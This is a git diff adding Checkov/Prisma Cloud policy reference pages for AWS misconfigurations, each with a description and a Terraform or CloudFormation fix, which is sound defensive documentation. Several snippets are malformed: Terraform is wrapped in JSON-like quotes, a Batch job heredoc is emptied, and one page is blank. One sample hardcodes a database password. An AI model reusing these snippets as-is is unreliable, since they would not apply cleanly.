your API. +It can reduce the cost of using your API by reducing the number of requests your backend service needs to handle. +It can also improve the reliability of your API by allowing it to continue functioning even if the backend service is unavailable or experiencing problems. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_api_gateway_method_settings" "pass" { + rest_api_id = aws_api_gateway_rest_api.fail.id + stage_name = aws_api_gateway_stage.fail.stage_name + method_path = "path1/GET" + + settings { + caching_enabled = true + metrics_enabled = false + logging_level = "INFO" + cache_data_encrypted = true + data_trace_enabled = false + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc new file mode 100644 index 000000000..9b9168a80 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc @@ -0,0 +1,75 @@ +== AWS App Flow connector profile does not use Customer Managed Keys (CMKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 530fa569-135d-4867-a837-722aec3cf138 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py[CKV_AWS_264] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies App Flow connector profile which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your App Flow connector profile data. +It gives you full control over the encrypted data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_appflow_connector_profile" "pass" { + name = "example_profile" + connector_type = "Redshift" + connection_mode = "Public" + kms_arn = aws_kms_key.example.arn + + + connector_profile_config { + + connector_profile_credentials { + redshift { + password = aws_redshift_cluster.example.master_password + username = aws_redshift_cluster.example.master_username + } + + } + + connector_profile_properties { + redshift { + bucket_name = aws_s3_bucket.example.name + database_url = "jdbc:redshift://${aws_redshift_cluster.example.endpoint}/${aws_redshift_cluster.example.database_name}" + role_arn = aws_iam_role.example.arn + } + + } + } + +}", +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc new file mode 100644 index 000000000..79adec42a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc @@ -0,0 +1,99 @@ +== AWS App Flow flow does not use Customer Managed Keys (CMKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7591727d-5d6f-4387-bbad-3adc9fc12f7d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py[CKV_AWS_263] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies App Flow flow which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your App Flow flow data. +It gives you full control over the encrypted data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_appflow_flow" "pass" { + name = "example" + + source_flow_config { + connector_type = "S3" + source_connector_properties { + s3 { + bucket_name = aws_s3_bucket_policy.example_source.bucket + bucket_prefix = "example" + } + + } + } + + + destination_flow_config { + connector_type = "S3" + destination_connector_properties { + s3 { + bucket_name = aws_s3_bucket_policy.example_destination.bucket + + s3_output_format_config { + prefix_config { + prefix_type = "PATH" + } + + } + } + + } + } + + + task { + source_fields = ["exampleField"] + destination_field = "exampleField" + task_type = "Map" + + connector_operator { + s3 = "NO_OP" + } + + } + + kms_arn = aws_kms_key.example.arn + + trigger_config { + trigger_type = "OnDemand" + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc new file mode 100644 index 000000000..654114760 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc @@ -0,0 +1,52 @@ +== AWS Appsync API Cache is not encrypted at rest + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f8d70949-c727-4d47-8570-a428519a8d0e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py[CKV_AWS_214] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Encryption of data at rest is a security feature that helps prevent unauthorized access to your data. +The feature uses AWS Key Management Service (AWS KMS) to store and manage your encryption keys and the Advanced Encryption Standard algorithm with 256-bit keys (AES-256) to perform the encryption. +If enabled, the feature encrypts the domain's: indices, logs, swap files, all data in the application directory, and automated snapshots. +We recommend you implement encryption at rest in order to protect a data store containing sensitive information from unauthorized access, and fulfill compliance requirements. + +=== Fix - Buildtime + + +[source,go] +---- +{ + "resource "aws_appsync_api_cache" "pass" { + api_id = aws_appsync_graphql_api.default.id + transit_encryption_enabled = true + at_rest_encryption_enabled = true + ttl = 60 + type = "SMALL" + api_caching_behavior = "FULL_REQUEST_CACHING" +}", + +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc new file mode 100644 index 000000000..733cb3d38 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc @@ -0,0 +1,55 @@ +== AWS Appsync API Cache is not encrypted in transit + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 91724d30-a293-4db3-bf5d-1a6dd04c6412 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py[CKV_AWS_215] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies the AWS Appsync API that are configured with disabled in-transit data encryption. +It is recommended that these resources will be configured with in-transit data encryption to minimize risk for sensitive data being leaked. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_appsync_api_cache" "pass" { + api_id = aws_appsync_graphql_api.default.id + transit_encryption_enabled = true + at_rest_encryption_enabled = true + ttl = 60 + type = "SMALL" + api_caching_behavior = "FULL_REQUEST_CACHING" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-has-field-level-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-has-field-level-logs-enabled.adoc new file mode 100644 index 000000000..8c740c99c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-has-field-level-logs-enabled.adoc @@ -0,0 +1,54 @@ +== AWS AppSync has field-level logs disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53f3d4fd-c735-4eae-bdfa-cedec9126d68 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py[CKV_AWS_194] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,CloudFormation + +|=== + + + +=== Description + +It is recommended to have a proper logging process for AWS AppSync in order to detect anomalous configuration activity. +It is used to track configuration changes conducted manually and programmatically and trace back unapproved changes. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_appsync_graphql_api" "all" { + authentication_type = "API_KEY" + name = "example" + + log_config { + cloudwatch_logs_role_arn = "aws_iam_role.example.arn" + field_log_level = "ALL" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-is-protected-by-waf.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-is-protected-by-waf.adoc new file mode 100644 index 000000000..0e80a5c51 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-is-protected-by-waf.adoc @@ -0,0 +1,55 @@ +== AWS AppSync is not protected by WAF + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a95d3ca6-f16e-42b8-929f-efb0f8f24f15 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml[CKV2_AWS_33] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Ensuring that your AWS AppSync API is protected by a Web Application Firewall (WAF) can help to improve the security of your API by protecting against common web vulnerabilities such as SQL injection attacks and cross-site scripting (XSS) attacks by inspecting incoming requests and blocking those that contain malicious payloads. +It can also help to prevent DDoS attacks by allowing you to set rate-based rules that limit the number of requests that an IP address can send to your API within a specified time period. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_appsync_graphql_api" "pass" { + authentication_type = "API_KEY" + name = "example" +} + + +resource "aws_wafv2_web_acl_association" "pass" { + resource_arn = aws_appsync_graphql_api.pass.arn + web_acl_arn = aws_wafv2_web_acl.example.arn +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsyncs-logging-is-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsyncs-logging-is-enabled.adoc new file mode 100644 index 000000000..fa0524ef9 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsyncs-logging-is-enabled.adoc @@ -0,0 +1,53 @@ +== AWS AppSync's logging is disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a84ac0e-9881-4afd-ac3c-7d5c6da1de8b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/master/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py[CKV_AWS_193] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,CloudFormation + +|=== + + + +=== Description + +It is recommended to have a proper logging process for AWS AppSync in order to track configuration changes conducted manually and programmatically and trace back unapproved changes. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_appsync_graphql_api" "enabled" { + authentication_type = "API_KEY" + name = "example" + + log_config { + cloudwatch_logs_role_arn = "aws_iam_role.example.arn" + field_log_level = "ERROR" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc new file mode 100644 index 000000000..fae84c5e8 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc @@ -0,0 +1,51 @@ +== AWS Lambda function URL AuthType set to NONE + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d80b48e4-f9de-4d75-ac4c-296169303d92 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/master/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py[CKV_AWS_258] + +|Severity +|LOW + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,CloudFormation + +|=== + + + +=== Description + +The AWS AuthType for your Lambda function URLs determines how users are authenticated when they access the URLs of your Lambda functions. +It is important to ensure that the AWS AuthType for your Lambda function URLs is defined because it helps to secure your functions and protect them from unauthorized access. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_lambda_function_url" "pass" { + function_name = aws_lambda_function.test.function_name + qualifier = "my_alias" + authorization_type = "AWS_IAM" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc new file mode 100644 index 000000000..2ab0dbb9f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc @@ -0,0 +1,82 @@ +== AWS Batch Job is defined as a privileged container + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 58156229-7822-40d0-871b-218e58a68462 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py[CKV_AWS_210] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By defining your AWS Batch job as a privileged container, you can ensure that it has the necessary privileges to access system devices, such as GPUs or hardware accelerators, modify system-level configuration files, and more. +That said, making a job overly permissive might increase the potential security risks, as the job will have more access to sensitive system resources + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "aws_batch_job_definition" "pass" { + name = "tf_test_batch_job_definition" + type = "container" + + container_properties = < + + + + + + + +DATA +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc new file mode 100644 index 000000000..140220ea0 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc @@ -0,0 +1,93 @@ +== AWS MQBroker's minor version updates are disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| faa7d1ae-cb47-44b5-be1f-aa76e4a9c6a9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py[CKV_AWS_207] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +When Amazon MQ supports a new version of a broker engine, you can upgrade your broker instances to the new version. +There are two kinds of upgrades: major version upgrades and minor version upgrades. +Minor upgrades helps maintain a secure and stable MQ broker with minimal impact on the application. +For this reason, we recommend that your automatic minor upgrade is enabled. +Minor version upgrades only occur automatically if a minor upgrade replaces an unsafe version, such as a minor upgrade that contains bug fixes for a previous version. + +//// +=== Fix - Runtime + + +CLI Command + + + + +[source,shell] +---- +{ + "aws mq update-broker \\ + --region ${region} \\ + --broker-id ${resource_id} \\ + --auto-minor-version-upgrade", +} +---- +//// + +=== Fix - Buildtime + + +*CloudFormation* + + + + +[source,yaml] +---- +Resources: + Example: + Type: "AWS::AmazonMQ::Broker" + Properties: + BrokerName: example + EngineType: ActiveMQ + EngineVersion: "5.15.9" + HostInstanceType: mq.t3.micro ++ AutoMinorVersionUpgrade: true +---- + + +*Terraform* + + + + +[source,go] +---- +resource "aws_mq_broker" "example" { + broker_name = "example" + engine_type = "ActiveMQ" + engine_version = "5.15.9" + host_instance_type = "mq.t3.micro" ++ auto_minor_version_upgrade = true +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc new file mode 100644 index 000000000..599fe5921 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc @@ -0,0 +1,75 @@ +== AWS MWAA environment has scheduler logs disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c848bd8a-2bb2-4c0b-9c2c-2b445cfdb811 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py[CKV_AWS_242] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +It is recommended to have a proper logging process for AWS MWAA environment scheduler in order to track configuration changes conducted manually and programmatically and trace back unapproved changes. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_mwaa_environment" "pass" { + dag_s3_path = "dags/" + execution_role_arn = "aws_iam_role.example.arn" + + logging_configuration { + dag_processing_logs { + enabled = true + log_level = "DEBUG" + } + + + scheduler_logs { + enabled = true + log_level = "INFO" + } + + } + + name = "example" + + network_configuration { + security_group_ids = ["aws_security_group.example.id"] + subnet_ids = "aws_subnet.private[*].id" + } + + + source_bucket_arn = "aws_s3_bucket.example.arn" +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc new file mode 100644 index 000000000..f2e80d37f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc @@ -0,0 +1,74 @@ +== AWS MWAA environment has webserver logs disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1f508c33-c9e1-4ee8-9f52-21300c096aea + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py[CKV_AWS_244] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +It is recommended to have a proper logging process for AWS MWAA environment webserver in order to track configuration changes conducted manually and programmatically and trace back unapproved changes. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_mwaa_environment" "pass" { + dag_s3_path = "dags/" + execution_role_arn = "aws_iam_role.example.arn" + + logging_configuration { + dag_processing_logs { + enabled = true + log_level = "DEBUG" + } + + + webserver_logs { + enabled = true + log_level = "INFO" + } + + } + + name = "example" + + network_configuration { + security_group_ids = ["aws_security_group.example.id"] + subnet_ids = "aws_subnet.private[*].id" + } + + + source_bucket_arn = "aws_s3_bucket.example.arn" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc new file mode 100644 index 000000000..641c3932b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc @@ -0,0 +1,70 @@ +== AWS MWAA environment has worker logs disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 15ca455c-9e3d-4547-ab70-cb81b99af3c2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py[CKV_AWS_243] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +It is recommended to have a proper logging process for AWS MWAA environment worker in order to track configuration changes conducted manually and programmatically and trace back unapproved changes. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_mwaa_environment" "pass" { + dag_s3_path = "dags/" + execution_role_arn = "aws_iam_role.example.arn" + + logging_configuration { + worker_logs { + enabled = true + log_level = "CRITICAL" + } + + } + + name = "example" + + network_configuration { + security_group_ids = ["aws_security_group.example.id"] + subnet_ids = "aws_subnet.private[*].id" + } + + + source_bucket_arn = "aws_s3_bucket.example.arn" +} + +", +} +---- +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc new file mode 100644 index 000000000..c9b573efe --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc @@ -0,0 +1,57 @@ +== AWS RDS Cluster activity streams are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 411d0425-c08a-4bd7-b226-0ed9f8663d3c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py[CKV_AWS_246] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies RDS Cluster activity streams which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your RDS Cluster activity streams data. +It gives you full control over the encrypted data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_rds_cluster_activity_stream +* *Arguments:* kms_key_id + + +[source,go] +---- +{ + "resource "aws_rds_cluster_activity_stream" "pass" { + resource_arn = aws_rds_cluster.default.arn + mode = "async" + kms_key_id = aws_kms_key.default.key_id + + depends_on = [aws_rds_cluster_instance.default] +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc new file mode 100644 index 000000000..6bbe8cb2b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc @@ -0,0 +1,75 @@ +== AWS RDS DB snapshot does not use Customer Managed Keys (CMKs) + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bf81d0e5-01d4-4372-a1d4-9a124e8f366d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py[CKV_AWS_266] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +This policy identifies database snapshots that were not encrypted with KMS. +It is a best practice to manage your own encryption keys for all storage volumes and snapshots. + +//// +=== Fix - Runtime +Changing the encryption method cannot be done for existing snapshots. +Instead, create a new snapshot and add the CMK encryption. + +. Open the Amazon RDS console. + +. In the navigation pane, choose Databases. + +. Choose the DB instance for which you want to create a manual snapshot. + +. Create a manual snapshot for your DB instance. + +. In the navigation pane, choose Snapshots. + +. Select the manual snapshot that you created. + +. Choose Actions, and then choose Copy Snapshot. + +. Under Encryption, select Enable Encryption. + +. For AWS KMS Key, choose the new encryption key that you want to use. + +. Choose Copy snapshot. + +. Restore the copied snapshot. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_db_snapshot_copy +* *Arguments:* kms_key_id + +[source,go] +---- +resource "aws_db_snapshot_copy" "pass" { +source_db_snapshot_identifier = aws_db_snapshot.example.db_snapshot_arn +target_db_snapshot_identifier = "testsnapshot1234-copy" +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc new file mode 100644 index 000000000..a58923453 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc @@ -0,0 +1,62 @@ +== AWS RDS PostgreSQL exposed to local file read vulnerability + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| afa1ed5a-f39d-457a-952d-be3ab101e077 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py[CKV_AWS_250] + +|Severity +|LOW + +|Subtype +|Build +//Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The log_fdw extension for Amazon Relational Database Service (AWS RDS) PostgreSQL instances allows you to query log files from foreign servers as if they were tables in a database. +However, certain versions of the log_fdw extension may contain vulnerabilities that can be exploited by attackers. +By ensuring that your AWS RDS PostgreSQL instances use a non-vulnerable version of the log_fdw extension, you can help protect your database from potential security threats. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + " +resource "aws_db_instance" "pass" { + name = "name" + instance_class = "db.t3.micro" + engine = "postgres" + engine_version = "13.3" +} + + +resource "aws_rds_cluster" "pass" { + engine = "aurora-postgresql" + engine_version = "11.9" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-uses-a-modern-cacert.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-uses-a-modern-cacert.adoc new file mode 100644 index 000000000..55e9c96da --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-uses-a-modern-cacert.adoc @@ -0,0 +1,61 @@ +== AWS RDS does not use a modern CaCert + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 008fd8a9-4766-4cc3-a8d4-006d4c0340da + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py[CKV_AWS_211] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By ensuring that your AWS RDS uses a modern CA certificate, you can help ensure that the certificate used to secure connections to your database is up to date and free of known vulnerabilities. +This can help protect your database from potential attacks and improve the overall security of your system. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + " +resource "aws_db_instance" "pass" { + allocated_storage = 20 + storage_type = "gp2" + engine = "mysql" + engine_version = "5.7" + instance_class = "db.t2.micro" + name = "mydb" + username = "foo" + password = "foobarbaz" + iam_database_authentication_enabled = true + storage_encrypted = true + ca_cert_identifier = "rds-ca-2019" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc new file mode 100644 index 000000000..5c75913dd --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc @@ -0,0 +1,30 @@ +== AWS replicated backups are not encrypted at rest by Key Management Service (KMS) using a Customer Managed Key (CMK) + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f7e759b2-f20e-44cd-bfd9-f94fb6a24210 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py[CKV_AWS_245] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +=== Fix - Buildtime diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ssm-parameter-is-encrypted.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ssm-parameter-is-encrypted.adoc new file mode 100644 index 000000000..364f7e1fa --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ssm-parameter-is-encrypted.adoc @@ -0,0 +1,56 @@ +== AWS SSM Parameter is not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 926b7056-6a39-4885-a806-8e4cf958fced + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml[CKV2_AWS_34] + +|Severity +|LOW + +|Subtype +|Build +//Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +As a best practice enable encryption for your AWS SSM Parameter to improve data security without making changes to your business or applications. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_ssm_parameter" "aws_ssm_parameter_ok" { + name = "sample" + type = "SecureString" + value = "test" + description = "policy test" + tier = "Standard" + allowed_pattern = ".*" + data_type = "text" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc new file mode 100644 index 000000000..21d80e20e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc @@ -0,0 